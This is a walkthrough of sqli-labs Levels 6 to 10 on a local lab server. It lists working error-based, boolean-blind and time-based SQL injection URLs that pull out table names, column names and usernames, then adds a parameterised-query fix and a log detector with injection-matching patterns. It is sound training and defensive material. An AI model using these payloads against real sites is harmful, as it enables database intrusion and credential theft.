Level 6
1. Identify the injection point and determine how the quote is closed
Appending a double quote causes an error, which shows that the page echoes the database error message somewhere.
http://127.0.0.1/Less-6/?id=1%22
Try to close the quote; the closing succeeds:
http://127.0.0.1/Less-6/?id=1%22%20--+
2. Query the database name
http://127.0.0.1/Less-6/?id=1%22%20and%20extractvalue(1,concat(1,database()))%20--+
3. Query the table names
http://127.0.0.1/Less-6/?id=1%22%20and%20extractvalue%281,concat%281,%28select%20group_concat%28table_name%29%20from%20information_schema.tables%20where%20table_schema=%27security%27%20%29%29%29%20%20--+
4. Query the column names
http://127.0.0.1/Less-6/?id=1%22%20and%20extractvalue(1,concat(1,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)))%20--+
5. Query the actual username and password values
http://127.0.0.1/Less-6/?id=1%22%20and%20extractvalue(1,concat(1,(select%20group_concat(username,password)%20from%20users)))%20--+
Level 7
1. Identify the injection point and determine how the quote is closed
http://127.0.0.1/Less-7/?id=1%27))%20--+
2. Query the database name
http://127.0.0.1/Less-7/?id=1%27))%20and%20length(database())%3E7%20--+
http://127.0.0.1/Less-7/?id=1%27))%20and%20length(database())%3E8%20--+
This shows the database name is 8 characters long.
http://127.0.0.1/Less-7/?id=1%27))%20and%20ascii(substr(database(),1,1))%3E114%20--+
Using an ASCII table and Burp to capture and replay the request, the database name is found directly to be security.
3. Query the table names
http://127.0.0.1/Less-7/?id=1%27))%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E100--+
http://127.0.0.1/Less-7/?id=1%27))%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E101--+
Greater than 100 but not greater than 101, so the first character of the first table name has ASCII code 101, 'e'.
And so on for the remaining characters.
...
Finally, the first table name is found to be emails.
This can also be worked out with Burp request capture and an ASCII table.
4. Query the column names
http://127.0.0.1/Less-7/?id=1'))%20and%20ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema='security'%20and%20table_name='users'%20limit%200,1),1,1))%3E104--+
http://127.0.0.1/Less-7/?id=1%27))%20and%20ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20limit%200,1),1,1))%3E105--+
So the first character of the first column of the users table has ASCII code 105, 'i'.
...
Finally, the first column of the users table is found to be id.
Same procedure as described above.
5. Query the actual username
http://127.0.0.1/Less-7/?id=1%27))%20and%20ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))%3E67--+
http://127.0.0.1/Less-7/?id=1%27))%20and%20ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))%3E68--+
So the first character of the first username row in the users table has ASCII code 68, 'D'.
...
Finally, the first username row in the users table is found to be Dumb.
Level 8
1. Identify the injection point and determine how the quote is closed
http://127.0.0.1/Less-8/?id=1%27
http://127.0.0.1/Less-8/?id=1%27%20--+
2. Query the database name
Use boolean-based blind injection.
http://127.0.0.1/Less-8/?id=1%27%20and%20length(database())%3E7--+
http://127.0.0.1/Less-8/?id=1%27%20and%20length(database())%3E8--+
This shows the database name is 8 characters long.
http://127.0.0.1/Less-8/?id=1%27%20and%20ascii(substr(database(),1,1))%3E114--+
http://127.0.0.1/Less-8/?id=1%27%20and%20ascii(substr(database(),1,1))%3E115--+
The first character of the database name has ASCII code 115, 's'.
Proceeding the same way
...
and repeating several more times,
the database name is finally found to be security.
3. Query the table names
http://127.0.0.1/Less-8/?id=1%27%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E100--+
http://127.0.0.1/Less-8/?id=1%27%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E101--+
Greater than 100 but not greater than 101, so the first character of the first table name has ASCII code 101, 'e'.
... and so on.
Finally, the first table name is found to be emails.
4. Query the first character of the first column of the users table
http://127.0.0.1/Less-8/?id=1%27%20and%20ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20limit%200,1),1,1))%3E104--+
http://127.0.0.1/Less-8/?id=1%27%20and%20ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20limit%200,1),1,1))%3E105--+
So the first character of the first column of the users table has ASCII code 105, 'i'.
...
Finally, the first column of the users table is found to be id.
5. Determine the first character of the first row of the username column
http://127.0.0.1/Less-8/?id=1%27and%20ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))%3E67--+
http://127.0.0.1/Less-8/?id=1%27and%20ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))%3E68--+
So the first character of the first username row in the users table has ASCII code 68, 'D'.
...
Finally, the first username row in the users table is found to be Dumb.
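The boolean oracle that Levels 7 and 8 rely on (the page renders or not depending on a condition appended after the closed quote) exists only because the id parameter is spliced into the SQL text. The following is an added example, not code from this walkthrough or from the sqli-labs project: it rebuilds that query shape against an in-memory SQLite table with constructed rows (SQLite stands in for MySQL so it runs offline), and shows that the same inputs give no oracle once the query is parameterised. The table contents, the function names and the integer-only id check are assumptions for illustration.

```python
"""Added example (not part of the sqli-labs walkthrough): why the boolean
oracle of Levels 7/8 exists, and why a parameterised query removes it.

Assumptions: an in-memory SQLite table named `users` with constructed rows;
SQLite replaces MySQL so the script runs offline, and the same
single-quote plus `--` closing shape the walkthrough uses applies here.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data shaped like the lab's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """String concatenation: the request parameter becomes part of the SQL
    text, mirroring the lab's WHERE id='$id' shape. A quote in the input
    closes the string and whatever follows is parsed as SQL."""
    sql = f"SELECT username FROM users WHERE id='{user_id}' LIMIT 1"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, user_id: str) -> list:
    """Parameterised: the value is bound, never parsed, so a quote or a
    comment marker inside it is just characters compared against id."""
    sql = "SELECT username FROM users WHERE id=? LIMIT 1"
    return conn.execute(sql, (user_id,)).fetchall()


def is_valid_id(raw: str) -> bool:
    """Defence in depth (assumed policy): an id is a non-negative integer, so
    anything else is rejected before a query is built at all."""
    return raw.isdigit()


def page_renders(rows: list) -> bool:
    """A boolean-blind page shows its normal content iff a row came back."""
    return len(rows) > 0


def oracle_exists(lookup) -> bool:
    """The oracle exists when appending a true condition and a false
    condition to the same id produces two different page states."""
    conn = make_db()
    true_case = page_renders(lookup(conn, "1' and 1=1-- "))
    false_case = page_renders(lookup(conn, "1' and 1=2-- "))
    return true_case != false_case


if __name__ == "__main__":
    print("vulnerable lookup leaks a boolean oracle:", oracle_exists(lookup_vulnerable))
    print("parameterised lookup leaks a boolean oracle:", oracle_exists(lookup_safe))
    print("is '1' a valid id:", is_valid_id("1"))
```

With the concatenated query the two probes return a row and no row respectively, which is exactly the page-differs signal the walkthrough reads one character at a time; with the bound parameter both probes return nothing, because the whole string is compared against the integer column and matches no row. Binding is the fix; the integer check is a second layer that stops the malformed id before any SQL is built.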
Level 9
if(<boolean blind condition>,sleep(3),1) // IF expression: when the boolean condition holds, sleep(3) runs; otherwise the expression evaluates to 1.
1. Testing shows that no value of id produces an error, so time-based blind injection can be used.
http://127.0.0.1/Less-9/?id=adbfsf
2. Test for time-based blind injection: if the response time equals the sleep() duration, the injection exists.
http://127.0.0.1/Less-9/?id=1%27%20and%20sleep(3)--+
3. Determine the first character of the database name
Take the first character of the database name with substr and test whether its ASCII code is greater than 114; the page takes three seconds to respond, so the first character's ASCII code is greater than 114:
http://127.0.0.1/Less-9/?id=1%27%20and%20if(ascii(substr(database(),1,1))%3E114%20,sleep(3),1)--+
The page is delayed by 3 seconds.
Test whether the ASCII code of the first character is greater than 115; the page responds normally, so it is not. Greater than 114 but not greater than 115 means the first character's ASCII code is 115.
http://127.0.0.1/Less-9/?id=1%27%20and%20if(ascii(substr(database(),1,1))%3E115%20,sleep(3),1)--+
The first character of the database name has ASCII code 115, 's'.
...
Finally, the database name is found to be security.
4. Query the first character of the first table in the security database
http://127.0.0.1/Less-9/?id=1%27%20%20and%20if(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E100%20,sleep(3),1)--+
The page is delayed by 3 seconds.
http://127.0.0.1/Less-9/?id=1%27%20%20and%20if(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E101%20,sleep(3),1)--+
The page responds normally.
Greater than 100 but not greater than 101, so the first character of the first table name has ASCII code 101, 'e'.
...
Finally, the first table name is found to be emails.
5. Determine the first character of the first column of the users table
http://127.0.0.1/Less-9/?id=1%27%20and%20if(ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20limit%200,1),1,1))%3E104%20,sleep(3),1)--+
The page is delayed by 3 seconds.
http://127.0.0.1/Less-9/?id=1%27%20and%20if(ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20limit%200,1),1,1))%3E105%20,sleep(3),1)--+
The page responds normally.
So the first character of the first column of the users table has ASCII code 105, 'i'.
...
Finally, the first column of the users table is found to be id.
6. Determine the first character of the first row of the username column
http://127.0.0.1/Less-9/?id=1%27and%20if(ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))%3E67%20,sleep(3),1)--+
The page is delayed by 3 seconds.
http://127.0.0.1/Less-9/?id=1%27and%20if(ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))%3E68,sleep(3),1)--+
So the first character of the first username row in the users table has ASCII code 68, 'D'.
...
Finally, the first username row in the users table is found to be Dumb.
Level 10
1. Testing shows that no value of id produces an error, so time-based blind injection can be used.
http://127.0.0.1/Less-10/?id=sfvdsgbl
2. Test for time-based blind injection: if the response time equals the sleep() duration, the injection exists.
http://127.0.0.1/Less-10/?id=1%22%20and%20sleep(3)--+
3. Determine the first character of the database name
Take the first character of the database name with substr and test whether its ASCII code is greater than 114; the page takes three seconds to respond, so the first character's ASCII code is greater than 114:
http://127.0.0.1/Less-10/?id=1%22%20and%20if(ascii(substr(database(),1,1))%3E114%20,sleep(3),1)--+
Test whether the ASCII code of the first character is greater than 115; the page responds normally, so it is not. Greater than 114 but not greater than 115 means the first character's ASCII code is 115.
http://127.0.0.1/Less-10/?id=1%22%20and%20if(ascii(substr(database(),1,1))%3E115%20,sleep(3),1)--+
The first character of the database name has ASCII code 115, 's'.
...
Finally, the database name is found to be security.
4. Query the first character of the first table in the security database
http://127.0.0.1/Less-10/?id=1%22%20and%20if(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E100%20,sleep(3),1)--+
The page is delayed by three seconds.
http://127.0.0.1/Less-10/?id=1%22%20and%20if(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))%3E101%20,sleep(3),1)--+
The page responds normally.
Greater than 100 but not greater than 101, so the first character of the first table name has ASCII code 101, 'e'.
...
Finally, the first table name is found to be emails.
5. Determine the first character of the first column of the users table
http://127.0.0.1/Less-10/?id=1%22%20and%20if(ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20limit%200,1),1,1))%3E104%20,sleep(3),1)--+
The page is delayed by three seconds.
http://127.0.0.1/Less-10/?id=1%22%20and%20if(ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20limit%200,1),1,1))%3E105%20,sleep(3),1)--+
So the first character of the first column of the users table has ASCII code 105, 'i'.
...
Finally, the first column of the users table is found to be id.
6. Determine the first character of the first row of the username column
http://127.0.0.1/Less-10/?id=1%22%20and%20if(ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))%3E67%20,sleep(3),1)--+
The page is delayed by three seconds.
http://127.0.0.1/Less-10/?id=1%22%20and%20if(ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))%3E68%20,sleep(3),1)--+
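Each technique in this walkthrough leaves a distinctive shape in the query string: extractvalue( for the error-based payloads of Level 6, ascii(substr( and length(database( for the boolean-blind payloads of Levels 7 and 8, sleep( for the time-based payloads of Levels 9 and 10, and in every case a closed quote followed by and plus a trailing comment. The following detector is an added example, not part of the walkthrough or of sqli-labs: it percent-decodes the query string of each access-log line, tags the shapes it finds, and for time-based hits checks whether the recorded response time actually shows the sleep delay. The log format (Apache combined style with a trailing rt=<seconds> field), the sample lines and the updatexml/benchmark alternatives in the rules are assumptions; the sample requests are taken from the page's own URLs, with timestamps and sizes made up.

```python
"""Added example, not from the walkthrough: classify the SQL injection shapes
used in Levels 6 to 10 when they appear in web-server access logs.

Assumptions (constructed for this example): Apache combined-style lines with a
trailing `rt=<seconds>` response-time field; the sample lines reuse the
walkthrough's own URLs, while timestamps and byte counts are made up.
"""
from __future__ import annotations

import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample log: one benign request plus four from the walkthrough.
SAMPLE_LOG = """\
127.0.0.1 - - [10/Oct/2023:12:00:01 +0000] "GET /Less-6/?id=1 HTTP/1.1" 200 1532 rt=0.004
127.0.0.1 - - [10/Oct/2023:12:00:02 +0000] "GET /Less-6/?id=1%22%20and%20extractvalue(1,concat(1,database()))%20--+ HTTP/1.1" 200 1611 rt=0.005
127.0.0.1 - - [10/Oct/2023:12:00:03 +0000] "GET /Less-8/?id=1%27%20and%20ascii(substr(database(),1,1))%3E114--+ HTTP/1.1" 200 1532 rt=0.004
127.0.0.1 - - [10/Oct/2023:12:00:07 +0000] "GET /Less-9/?id=1%27%20and%20if(ascii(substr(database(),1,1))%3E114%20,sleep(3),1)--+ HTTP/1.1" 200 1532 rt=3.006
127.0.0.1 - - [10/Oct/2023:12:00:08 +0000] "GET /Less-9/?id=1%27%20and%20if(ascii(substr(database(),1,1))%3E115%20,sleep(3),1)--+ HTTP/1.1" 200 1532 rt=0.005
"""

# Assumed log line layout: combined format plus a trailing rt=<seconds> field.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+) \S+ rt=(?P<rt>[\d.]+)$'
)

# Ordered so the more specific technique is listed first in the tags.
# updatexml and benchmark are common MySQL companions of the page's functions.
RULES = [
    ("error-based", re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)),
    ("time-based", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("boolean-blind", re.compile(r"\bascii\s*\(\s*substr\s*\(|\blength\s*\(\s*database\s*\(", re.I)),
    ("schema-enumeration", re.compile(r"\binformation_schema\.", re.I)),
]
# Generic "closed the original string, appended a condition, commented out the rest".
CLOSING_RE = re.compile(r"""['")]\s*(and|or)\b""", re.I)
COMMENT_RE = re.compile(r"--\s|#")


def decode_query(target: str) -> str:
    """Percent-decode the query string once. `+` becomes a space, which is why
    the walkthrough's `--+` terminator shows up here as `-- `."""
    return unquote_plus(urlsplit(target).query)


def classify(query: str) -> list[str]:
    """Return the technique tags whose pattern appears in a decoded query."""
    tags = [name for name, rx in RULES if rx.search(query)]
    if CLOSING_RE.search(query) and COMMENT_RE.search(query):
        tags.append("quote-closing")
    return tags


def scan(log_text: str, slow_threshold: float = 2.5) -> list[dict]:
    """Parse each line, tag suspicious queries, and for time-based hits record
    whether the observed latency confirms that the injected sleep() ran."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skipped rather than silently trusted
        query = decode_query(m["target"])
        tags = classify(query)
        if not tags:
            continue
        findings.append({
            "ip": m["ip"],
            "path": urlsplit(m["target"]).path,
            "tags": tags,
            "confirmed_delay": "time-based" in tags and float(m["rt"]) >= slow_threshold,
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

The time-based rule pairs the request pattern with the observed latency: a sleep(3) payload whose response took about 3 s is a confirmed delay (the injected condition was true), while the same payload returning in milliseconds (the condition was false) is still flagged on the pattern alone, since both requests are part of the same character-by-character extraction. Decoding with unquote_plus before matching matters because the payloads arrive percent-encoded, and the `--+` terminator only reads as a SQL comment once `+` has been turned back into a space.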